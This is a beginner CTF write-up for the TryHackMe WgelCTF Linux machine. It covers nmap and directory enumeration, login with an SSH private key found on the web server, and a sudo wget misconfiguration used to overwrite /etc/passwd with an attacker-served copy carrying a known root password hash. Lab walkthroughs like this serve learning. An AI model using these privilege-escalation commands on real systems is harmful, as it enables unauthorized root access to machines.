TryHackMe WgelCTF-Writeup

WgelCTF is a beginner level Linux machine on TryHackMe.This machine targeted to people who want to get a taste of CTFs and understand the basic enumeration is done in a CTF. The machine has an SSH private on the webserver which is used to gain access to the machine and there is a sudo misconfiguration that is exploited to gain root access to the machine


Connecting to HTB Vpn:

1] First download the vpn file from the access page of tryhackme
2] Open the .ovpn file in your terminal with the following command

openvpn yourname.ovpn

3] Now as the “Initialization Completed” message appears on the screen you are connected to the hack the box network
4] You can access the machine at the given IP


1] First let’s do a nmap scan on our target at

nmap -sV -A -p-

-sV : to get the service versions on each port
-A : to get information such as os details,traceroutes,ports etc
-p- : to scan all 65535 ports
We get the following details from our scan



2] There is a web server running and upon visiting it we are greeted with the default apache web server page. But if we look at the source code we get a username jessie


3] Next let’s enumerate the http port with a normal directory scan



4] So there is a directory called sitemap and upon visiting it we are greeted with a web page


5] After enumerating this page more i could get any lead, so i did a directory scan on this directory


6] Then we found a directory .ssh and inside it there was an ssh private key



7] Since we have a username and a ssh key, lets login using ssh

Chmod 600 id_rsa
ssh -i id_rsa [email protected]


8] We can now read the user flag located at the users Documents directory


9] First let’s check for the sudo permission allowed for this user

sudo -l


10] It says we can run wget as the root user
11] So we will copy the /etc/passwd file and save it as a new file in our system. Then we will make an password hash

openssl passwd -1 123

12] And then store this password hash in the /etc/passwd we copied from the machine. Replace the X with our hash


13] Now we have change the root users password to 123 in this /etc/passwd file

14] Next we replace the /etc/passwd of the remote machine with this /etc/passwd file we just created so that the root users password will be 123
15] First start a python web server on your machine

python -m SimpleHTTPServer

And use wget on the remote machine to replace the etc/passwd file with our custom /etc/passwd file sudo wget;8000/passwordfile -O /etc/passwd


16] Now we have the replace the /etc/passwd file and the root user’s password as 123. Let’s login as root

su root


Don’t forget to check out our latest Blogs  – CompTIA Security+ Overview

Leave a Reply

Your email address will not be published. Required fields are marked *